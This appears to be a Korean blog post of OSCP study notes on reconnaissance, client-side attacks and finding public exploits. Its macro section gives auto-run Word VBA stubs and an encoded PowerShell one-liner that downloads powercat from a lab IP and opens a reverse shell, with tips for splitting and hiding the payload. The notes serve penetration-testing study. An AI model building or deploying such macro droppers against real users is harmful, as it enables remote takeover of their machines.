Target Reconnaissance
- Information Gathering
타겟과 직접 상호작용 하지 않고, 공개되어 있는 타겟 정보의 메타 데이터를 통해서 추가 정보를 확인할 수 있다.
site:example.com filetype:pdf 검색으로 타겟의 웹 페이지에 공개되어 있는 PDF file을 찾을 수도 있고,
gobuster -x(확장자) 옵션으로 검색도 가능하다.
kali@kali:~/Downloads$ gobuster dir -u 192.168.189.197 -x pdf -w /usr/share/wordlists/dirb/common.txt -t 5
찾은 PDF 파일은 이후 exiftool 로 메타데이터 정보를 확인한다.
kali@kali:~/Downloads$ exiftool -a -u old.pdf
- Client Fingerprinting
라우팅 할 수 없는 내부 네트워크 대상에서 운영 체제 및 브라우저의 정보를 얻기 위해 진행
Canarytoken 활용
* Canarytoken : 토큰이 내장되어 있는 링크를 생성하는 무료 웹 서비스 도구
Exploiting Microsoft Office
- Preparing the Attack
- Installing Microsoft Office
- Leveraging Microsoft Word Macros
* Macro 는 Visual Basic for Applications(VBA) 로 작성 가능하다.
* Dynamic Data Exchange(DDE), Object Linking and Embedding(OLE) 는 목표 시스템의 큰 수정 없이는 오늘날 잘 동작하지 않는다.
Powercat 을 다운로드 하고 타겟에서 리버스 쉘을 실행시키기 위한 작업들
① Window Script Host Shell 을 이용하여 매크로에서 Powershell 실행
CreateObject("Wscript.Shell").Run "powershell"
② 오피스 매크로 자동 실행을 위한 함수 AutoOpen() Document_Open()
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
③ ps 문 작성 이후 변수(Dim Str As String)에 넣기
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
* ps 문은 특정 문자 에러 피하기 위한 base64 인코딩(★ ★ ★ 인코딩 사이트에서 할때는 UTF-16LE !!! (MS OS, Office용 유니코드) 로 설정해놓고 한다. 이거 때문에 많이 헤맸다....)
* VBA 는 문자열 입력 255개 제한으로 잘라서 변수에 넣어주기
str = "powershell.exe -nop -w hidden -e SQBFAwA...(Encoded base64)"
n = 50
for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')
Abusing Windows Library Files
- Obtaining Code Execution via Windows Library Files
Locating Public Exploits
Online Exploit Resources
★ The Exploit Database : 공개 취약점들에 대한 exploit 모아둔 무료 아카이브
Packet Storm : 보안 뉴스, 취약점, tool 등에 대한 최신 소식
★★ GitHub : exploit을 포함한 code 공유 플랫폼(가장 넓고 개방적으로 이용 가능한 만큼 공급망 공격에도 많이 활용 됨)
Google Search Operators : 검색 연산자를 추가하여 상세 취약점 검색 가능
ex) kali@kali:~$ firefox --search "Microsoft Edge site:exploit-db.com"
Offline Exploit Resources
Exploit Frameworks
- Metasploit : 간단한 사전 설정으로 미리 구성된 exploit을 실행하는 도구
- Core Impact : 테스트 자동화 및 취약점 스캐너와 연동해 점검하는 도구
- Canvas
- The Browser Exploitation Framework(BeEF) : client-side attacks 에 중점을 둔 침투 테스트 도구
SearchSploit
- 여러 옵션을 넣어 exploit 을 상세 검색하는 도구(Kali 에는 기본 설치되어있는 exploitdb package 를 활용.)
ex) kali@kali:~$ searchsploit remote smb microsoft windows
kali@kali:~$ searchsploit -m windows/remote/48537.py (-m 옵션은 현재 폴더 위치에 해당 파일 복사)
Nmap NSE Scripts
- enumerate, brute force, fuzz, detect 등 의 다양한 동작을 자동화 한 도구
NSE(Nmap Scripting Engine)
Default scripts route : /usr/share/nmap/scripts/
Exploiting a Target
Putting It Together
'공부 > OSCP' 카테고리의 다른 글
OSCP 공부 현황(Hack the box) (2) | 2024.10.22 |
---|---|
OSCP - 6(Fixing Exploits/Password Attacks) (0) | 2024.03.01 |
OSCP - 4(SQL Injeciton Attacks) (0) | 2024.03.01 |
OSCP - 3(Web Application Attacks) (0) | 2024.03.01 |
OSCP - 2 (0) | 2024.03.01 |